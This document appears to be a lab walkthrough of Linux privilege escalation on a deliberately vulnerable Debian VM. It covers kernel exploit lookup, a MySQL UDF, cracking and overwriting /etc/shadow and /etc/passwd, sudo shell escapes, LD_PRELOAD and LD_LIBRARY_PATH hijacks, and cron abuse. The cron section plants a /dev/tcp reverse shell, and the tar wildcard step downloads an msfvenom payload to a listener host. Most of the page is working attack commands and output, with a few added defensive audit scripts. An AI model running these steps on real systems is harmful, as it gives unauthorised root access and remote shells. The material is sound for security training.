
# Linux Privilege Escalation

## Kernel Exploits

### What is a Kernel?

* ***THIS SHOULD BE YOUR LAST RESORT: kernel exploits can be unstable and may crash the system!***
* The kernel is the core of any operating system.
* Think of it as a layer between application software and the actual computer hardware.
* The kernel has complete control over the operating system, so a successful kernel exploit results in code execution as the root user.

### How do I find Kernel Exploits?

1. Enumerate the kernel version (`uname -a`)
2. Find matching exploits (Google, ExploitDB, GitHub)
3. Compile and run

### Kernel Exploit Example

![](/files/-MQ8chVnYKM7s9UutSsP)

* Kernel Version is 2.6.32

#### Using Searchsploit to find an exploit

![No matches](/files/-MQ8gIbajqgWsjA816JF)

#### More specific search

![No luck :(](/files/-MQ8glDhBVogn0ilUOUE)

#### Using Linux Exploit Suggester 2

{% embed url="https://github.com/jondonas/linux-exploit-suggester-2" %}

```
./linux-exploit-suggester-2.pl -k 2.6.32

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.32
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [4] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [5] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [6] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [8] msr
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [9] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [10] ptrace_kmod2
      Alt: ia32syscall,robert_you_suck       CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [11] rawmodePTY
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [12] rds
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [13] reiserfs
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [14] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024
```

Looking at the results, we can see that a popular kernel exploit (Dirty COW) applies to this version.

{% embed url="https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54" %}

![](/files/-MQ8iD7_sSjR760Paj22)

#### Run the exploit and execute the /usr/bin/passwd binary

![](/files/-MQ8k96N-tjhrhrZKjo-)

## Service Exploits

### What are Services?

* Programs that run in the background, accepting input or performing regular tasks.
* If a vulnerable service is running as root, exploiting it can lead to command execution as root.
* Service exploits can be found using Searchsploit, Google and GitHub.

### Services Running as Root

The following command shows all processes that are running as root.

```
ps aux | grep "^root"
```

For each result, try to identify the version number of the program being executed.

### Enumerating Program Versions

```
<program> --version
<program> -v

# dpkg lists installed packages and their versions (Debian-based systems)
dpkg -l | grep <program>

# RPM-based systems
rpm -qa | grep <program>
```

### Service Exploit Example

```
./lse.sh -l 1 -i
```

![](/files/-MQ9-lKGTX2-3Hx6Tinf)

* MySQL is running as root.
* You can connect to MySQL as root without a password!

![version 5.1.73](/files/-MQ91-dMw1rcAnrBk3aF)

You can verify with:

```
ps aux | grep '^root'
```

This lists the processes running as root, including mysqld.

#### Why is this important?

MySQL can install user-defined functions (UDFs) that run from shared objects. The following exploit installs a new function that allows system commands to be executed from the MySQL prompt; the commands run as root because MySQL is running as root.

{% embed url="https://www.exploit-db.com/exploits/1518" %}

```
# Compile the UDF source as a position-independent object, then load the resulting
# shared object from the MySQL prompt to execute commands
gcc -g -c raptor_udf2.c -fPIC
```

## Port Forwarding

Sometimes a root process is bound to an internal port through which it communicates. You can forward that port to your own machine with the following SSH command:

```
ssh -R <local-port>:127.0.0.1:<service-port> <username>@<local-machine>
```

```
# Determine which port MySQL is listening on
netstat -nl

# On the target machine
ssh -R 4444:127.0.0.1:3306 kali@10.0.2.4

# On the Kali machine
mysql -u root -h 127.0.0.1 -P 4444

select @@hostname;
```

## Weak File Permissions

If file permissions are weak, system files can be abused to perform privilege escalation.

* /etc/shadow contains password hashes and by default is only readable by root.
* If we can read this file, we may be able to crack the root user's hash.
* If we can modify it, we can replace the root user's hash with a hash we know.

```
./lin.sh -i | more 
[!] sys030 Can we read /etc/shadow file?................................... yes!
---
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::

# The file is both world-readable and world-writable
user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow
user@debian:~/tools/privesc-scripts$ 

user@debian:~/tools/privesc-scripts$ head -n 1 /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
user@debian:~/tools/privesc-scripts$ 
```

This is the important part: the field between the first two colons holds the hash. In this case it is:

```
$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0
```

### Cracking the hash

```
kali@kali:~$ sudo john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password123      (?)
1g 0:00:00:00 DONE (2021-01-04 19:48) 1.515g/s 2327p/s 2327c/s 2327C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

### Writing to shadow

Similarly, because the shadow file is writable, we can replace the root hash with one for a password we know:

```
./lse -l 1 -i | more 
[*] fst000 Writable files outside user's home.............................. yes!
---
/var/tmp
/var/run/acpid.socket
/var/run/mysqld/mysqld.sock
/var/lock
/etc/exports
/etc/init.d/rc.local
/etc/passwd
/etc/shadow
/usr/local/bin/overwrite.sh
/usr/lib/mysql/plugin/raptor_udf2.so
/tmp
/tmp/tmp.xW1WW6YYpu
/tmp/tmp.bm5h9a7TlX
---


user@debian:~/tools/privesc-scripts$ ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25  2019 /etc/shadow
user@debian:~/tools/privesc-scripts$ cp  /etc/shadow /home/user/shadow_backup
user@debian:~/tools/privesc-scripts$ cd
user@debian:~$ ls
myvpn.ovpn  shadow_backup  tools
user@debian:~$ mkpasswd -m sha-512 newpassword
$6$U/HhooXBT/y$YW6kInvyKKJUpIj53rarfn9rMaTWfKlw91KpRHPW88bVzPj3KAgFkYeb4sNZmoC7SfTS5lAYRhRVIyiEe4rjE.
user@debian:~$ 

user@debian:~$ vim /etc/shadow
user@debian:~$ su
Password: 
root@debian:/home/user# 
```

### Reading and Writing passwd file

* /etc/passwd used to contain password hashes, back in the day.
* A hash in /etc/passwd takes precedence over the /etc/shadow entry.

![](/files/-MQF7i6T0bpcYe9NGwEt)

```
root@debian:/home/user# ls -l /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25  2019 /etc/passwd
root@debian:/home/user# openssl passwd "password"
YQyhPgG7w5s3s
root@debian:/home/user# vi /etc/passwd
root@debian:/home/user# exit
exit
user@debian:~$ su 
Password: 
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user# 
```

You can also create a new user with root privileges by adding a line at the bottom of /etc/passwd; any account whose UID is 0 is root.
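The checks above (a world-readable or world-writable shadow file, a hash or an extra UID 0 account in passwd) can be automated. This is an added example, not code from the original notes: it parses constructed passwd/shadow text and `ls -l` permission strings so it runs offline; the sample root hash is a placeholder, and the DES hash in the passwd sample is the page's own `openssl passwd` output.

```python
import stat
from datetime import date, timedelta

# Constructed sample data (not a real system). The passwd file shows both problems the
# notes describe: a second UID 0 account, and a hash in the password field (overrides shadow).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
user:x:1000:1000:user,,,:/home/user:/bin/bash
newroot:YQyhPgG7w5s3s:0:0:newroot:/root:/bin/bash
"""
# Constructed shadow lines; the root hash is a placeholder, not the one on the page.
SAMPLE_SHADOW = """\
root:$6$SALTSALT$PLACEHOLDERHASH:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
mysql:!:18133:0:99999:7:::
"""
HASH_PREFIXES = {"$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def mode_from_ls(perms):
    """Turn the permission column of `ls -l` (e.g. '-rw-r--rw-') into mode bits;
    setuid/setgid/sticky letters are counted as the plain x bit."""
    mode = 0
    for i, ch in enumerate(perms[1:10]):
        if ch != "-":
            mode |= 1 << (8 - i)
    return mode


def audit_file_mode(path, mode):
    """World-writable matters for both files; world-readable matters for shadow."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable ({oct(mode & 0o777)})")
    if path.endswith("shadow") and mode & stat.S_IROTH:
        findings.append(f"{path}: world-readable ({oct(mode & 0o777)})")
    return findings


def audit_passwd(text):
    """Flag extra UID 0 accounts and password fields not deferred to shadow ('x')."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw, uid = line.split(":")[:3]
        if uid == "0" and name != "root":
            findings.append(f"passwd: '{name}' has UID 0")
        if pw == "":
            findings.append(f"passwd: '{name}' has an empty password field")
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(f"passwd: '{name}' has a hash in passwd (overrides shadow)")
    return findings


def describe_shadow(line):
    """Split one shadow entry: the hash sits between the first two colons and the
    third field is the last-change day count since 1970-01-01."""
    f = line.split(":")
    h = f[1]
    if h.startswith(("!", "*")):
        algo = "locked"
    elif h == "":
        algo = "empty"
    else:
        algo = next((v for k, v in HASH_PREFIXES.items() if h.startswith(k)), "descrypt/unknown")
    changed = date(1970, 1, 1) + timedelta(days=int(f[2])) if f[2] else None
    return {"user": f[0], "hash": h, "algorithm": algo, "last_change": changed}
```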

### Backups

* Even though backups may exist, they may be stored insecurely. Check /home, /root, /tmp and /var/backups.

```
root@debian:/.ssh# cat root_key 
-----BEGIN RSA PRIVATE KEY-----
[key material omitted]
-----END RSA PRIVATE KEY-----
root@debian:/.ssh# grep PermitRootLogin /etc/ssh/sshd_config 
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".
root@debian:/.ssh# 



kali@kali:~$ vi root_key 
kali@kali:~$ chmod 600 root_key 
kali@kali:~$ ssh -i root_key root@10.0.2.7
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan  3 14:00:26 2021
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:~# 
```

## Running Sudo

```
user@debian:~/tools/privesc-scripts$ ./lse.sh -i | more 
[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more


user@debian:~/tools/privesc-scripts$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

```
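An added example, not from the original notes, that audits `sudo -l` output for the three things shown above: env_keep preserving LD_PRELOAD/LD_LIBRARY_PATH, NOPASSWD rules, and binaries GTFOBins lists as shell escapes. The sample output and the binary lists are constructed from the entries on this page and are not a complete GTFOBins list.

```python
import os
import re

# Constructed sample, modelled on the `sudo -l` output shown above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/sbin/apache2
    (root) /usr/bin/id
"""

# Keeping either variable lets the caller load their own code into the root process.
DANGEROUS_ENV_KEEP = {"LD_PRELOAD", "LD_LIBRARY_PATH"}
# Constructed subset of the binaries on this page that GTFOBins lists as sudo shell escapes.
SHELL_ESCAPE_BINS = {"find", "vim", "nano", "less", "more", "man", "awk", "nmap", "ftp"}
# apache2 -f <file> reports the first line of any file, so it reads root-only files.
FILE_READ_BINS = {"apache2"}

# "(runas) TAG: TAG: command" -- tags such as NOPASSWD: are optional
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return (env_keep_vars, rules); each rule is (runas, [tags], command)."""
    env_keep = set()
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        env_keep.update(re.findall(r"env_keep\+=([A-Za-z_]+)", line))
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            rules.append((m.group("runas"), tags, m.group("cmd").strip()))
    return env_keep, rules


def audit_sudo(text):
    """Turn the parsed rules into the findings a reviewer of this sudoers would raise."""
    env_keep, rules = parse_sudo_l(text)
    findings = []
    for var in sorted(env_keep & DANGEROUS_ENV_KEEP):
        findings.append(f"env_keep preserves {var}; any sudo command can be hijacked")
    for runas, tags, cmd in rules:
        prog = os.path.basename(cmd.split()[0])
        how = "without a password" if "NOPASSWD" in tags else "with a password"
        if cmd == "ALL":
            findings.append(f"ALL commands as {runas} {how}")
        elif prog in SHELL_ESCAPE_BINS:
            findings.append(f"{cmd} as {runas} {how}: shell escape (see GTFOBins)")
        elif prog in FILE_READ_BINS:
            findings.append(f"{cmd} as {runas} {how}: can read root-only files")
    return findings
```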

{% embed url="https://gtfobins.github.io/" %}

```
user@debian:~/tools/privesc-scripts$ sudo find . -exec /bin/sh \; -quit
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.1# whoami
root
```

### Utilizing Apache

```
user@debian:~/tools/privesc-scripts$ sudo apache2 -f /etc/shadow
Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
```

### LD_PRELOAD

```
user@debian:~/tools/sudo$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ls -l
total 8
-rw-r--r-- 1 user user 184 May 15  2020 library_path.c
-rw-r--r-- 1 user user 149 May 15  2020 preload.c
user@debian:~/tools/sudo$ gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
user@debian:~/tools/sudo$ sudo LD_PRELOAD=/tmp/preload.so find
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo# whoami
root
```

### LD_LIBRARY_PATH

* This environment variable contains a list of directories that are searched first for shared libraries.
* The `ldd` command prints the shared libraries used by a program:

  ```
  ldd /usr/sbin/apache2
  ```

* By creating a library with the same name as one used by the program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead.

```
user@debian:~/tools/sudo$ sudo -l 
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
user@debian:~/tools/sudo$ ldd /usr/sbin/apache2
	linux-vdso.so.1 =>  (0x00007fff42178000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fa3a02e8000)
	libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fa3a00c4000)
	libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fa39fe8a000)
	libpthread.so.0 => /lib/libpthread.so.0 (0x00007fa39fc6e000)
	libc.so.6 => /lib/libc.so.6 (0x00007fa39f902000)
	libuuid.so.1 => /lib/libuuid.so.1 (0x00007fa39f6fd000)
	librt.so.1 => /lib/librt.so.1 (0x00007fa39f4f5000)
	libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fa39f2be000)
	libdl.so.2 => /lib/libdl.so.2 (0x00007fa39f0b9000)
	libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007fa39ee91000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fa3a07a5000)
user@debian:~/tools/sudo$ ls
library_path.c  preload.c
user@debian:~/tools/sudo$ gcc -o libcrypt.so.1 -shared -fPIC library_path.c 
user@debian:~/tools/sudo$ sudo LD_LIBRARY_PATH=. apache2
apache2: ./libcrypt.so.1: no version information available (required by /usr/lib/libaprutil-1.so.0)
root@debian:/home/user/tools/sudo# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user/tools/sudo# 
```

## CronJOBBERS

* Cronjobs are programs or scripts that run at a scheduled time at certain time intervals
* Crontabs store the configuration for cronjobs. They are located at:
  * /var/spool/cron/
  * /var/spool/cron/crontabs/
  * system-wide: /etc/crontab

### File Permissions

Misconfiguration of a file permission associated with a cronjob can lead to easy Root!

```
./lse.sh -l 1 -i | more

[*] ret020 Cron jobs....................................................... yes!
---
/etc/crontab:SHELL=/bin/sh
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
/etc/crontab:17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
/etc/crontab:25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
/etc/crontab:47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
/etc/crontab:52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/crontab:* * * * * root overwrite.sh
/etc/crontab:* * * * * root /usr/local/bin/compress.sh

user@debian:~/tools/privesc-scripts$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh

user@debian:~/tools/privesc-scripts$ locate overwrite.sh
/usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ 

#REVERSE SHELL ON THE JOBBER
user@debian:~/tools/privesc-scripts$ ls -l /usr/local/bin/overwrite.sh
-rwxr--rw- 1 root staff 40 May 13  2017 /usr/local/bin/overwrite.sh
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh 
user@debian:~/tools/privesc-scripts$ vi /usr/local/bin/overwrite.sh 
user@debian:~/tools/privesc-scripts$ cat /usr/local/bin/overwrite.sh 
#!/bin/bash

/bin/bash -i >& /dev/tcp/10.0.2.4/1111 0>&1
user@debian:~/tools/privesc-scripts$ 
```

### Writing Paths present in Cronjobs

* In crontabs the PATH environment variable defaults to /usr/bin:/bin.
* The PATH variable can be overridden in the crontab file.
* If a cronjob does not use an absolute path, and one of the PATH directories is writable by our user, we may be able to create a program or script with the same name as the cronjob's command, which cron then runs instead.

```
./lse.sh -l 1 -i | more
[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin


user@debian:~/tools/privesc-scripts$ vim overwrite.sh
user@debian:~/tools/privesc-scripts$ chmod +x overwrite.sh 
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ pwd
/home/user/tools/privesc-scripts
user@debian:~/tools/privesc-scripts$ cp overwrite.sh /home/user/
user@debian:~/tools/privesc-scripts$ watch -n 1 ls -l /tmp
user@debian:~/tools/privesc-scripts$ ls -l /tmp/
total 1044
-rw-r--r-- 1 root root 100740 Jan  4 08:29 backup.tar.gz
-rwxr-xr-x 1 user user   3857 Jan  4 07:36 preload.so
-rwsr-sr-x 1 root root 926536 Jan  4 08:29 rootbash
-rw------- 1 user user   7817 Jan  4 08:04 tmp.5CqN3heSzG
-rw------- 1 user user  11151 Jan  4 08:03 tmp.EVXGVRQj7P
-rw-r--r-- 1 root root     28 Jan  4 08:09 useless
user@debian:~/tools/privesc-scripts$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# whoami
root
```

### WildCards

{% embed url="https://gtfobins.github.io/gtfobins/tar/#sudo" %}

#### On our attacker machine

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.2.4 LPORT=4444 -f elf -o shell.elf
```

#### On our target machine

```
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@debian:~$ wget http://10.0.2.4:80/shell.elf 
--2021-01-04 08:39:27--  http://10.0.2.4/shell.elf
Connecting to 10.0.2.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: “shell.elf”

100%[=================================================================================================================>] 194         --.-K/s   in 0s      

2021-01-04 08:39:27 (52.0 MB/s) - “shell.elf” saved [194/194]

user@debian:~$ ls
myvpn.ovpn  overwrite.sh  shadow_backup  shell.elf  tools
user@debian:~$ chmod +x shell.elf 
user@debian:~$ touch ./--checkpoint=1
user@debian:~$ touch ./--checkpoint-action=exec=shell.elf
user@debian:~$ 

```

#### Attacker machine

```
kali@kali:~$ nc -lvnp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.2.7.
Ncat: Connection from 10.0.2.7:55114.
id
uid=0(root) gid=0(root) groups=0(root)
```
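An added example, not part of the original notes, covering the three cron weaknesses above in one audit: a relative command resolved through a writable PATH directory, a world-writable job script, and tar run on a wildcard. The crontab, the directory-writability map and the script contents are constructed from this page's values so the audit runs offline; `@reboot`-style entries are not handled.

```python
import re
import stat

# Constructed sample crontab, modelled on the /etc/crontab shown above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
"""
# Constructed view of the target: directories an unprivileged user can write to,
# and (mode, contents) of the scripts the jobs run.
WRITABLE_DIRS = {"/home/user", "/tmp"}
SCRIPTS = {
    "/usr/local/bin/overwrite.sh": (0o746, "#!/bin/bash\necho done > /tmp/useless\n"),
    "/usr/local/bin/compress.sh": (0o755, "#!/bin/sh\ncd /home/user\ntar czf /tmp/backup.tar.gz *\n"),
}
DEFAULT_PATH = ["/usr/bin", "/bin"]          # cron's PATH when the crontab sets none
SHELL_BUILTINS = {"cd", "test", "[", "echo"}  # never resolved through PATH


def parse_crontab(text):
    """Return (path_dirs, jobs) for the system crontab format; jobs are (user, command)."""
    path_dirs = list(DEFAULT_PATH)
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_]+)=(.*)$", line)
        if m:
            if m.group(1) == "PATH":
                path_dirs = m.group(2).split(":")
            continue
        parts = line.split(None, 6)          # m h dom mon dow user command
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return path_dirs, jobs


def audit_crontab(text, writable_dirs=WRITABLE_DIRS, scripts=SCRIPTS):
    """Report PATH hijack points, writable job scripts and tar wildcard usage."""
    path_dirs, jobs = parse_crontab(text)
    findings = []
    for user, command in jobs:
        prog = command.split()[0]
        if "/" in prog:
            real = prog
        elif prog in SHELL_BUILTINS:
            continue
        else:
            # Relative command: cron searches PATH in order, so a writable directory
            # that comes before the genuine location lets a user plant a lookalike.
            real = next((p for p in scripts if p.endswith("/" + prog)), None)
            for d in path_dirs:
                if real == f"{d}/{prog}":
                    break
                if d in writable_dirs:
                    findings.append(f"{user} job '{prog}' is resolved via writable PATH dir {d}")
        if real in scripts:
            mode, source = scripts[real]
            if mode & stat.S_IWOTH:
                findings.append(f"{real} (run by {user}) is world-writable ({oct(mode)})")
            if re.search(r"\btar\b.*\s\*", source):
                findings.append(f"{real} runs tar on a wildcard; filenames can be parsed as options")
    return findings
```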

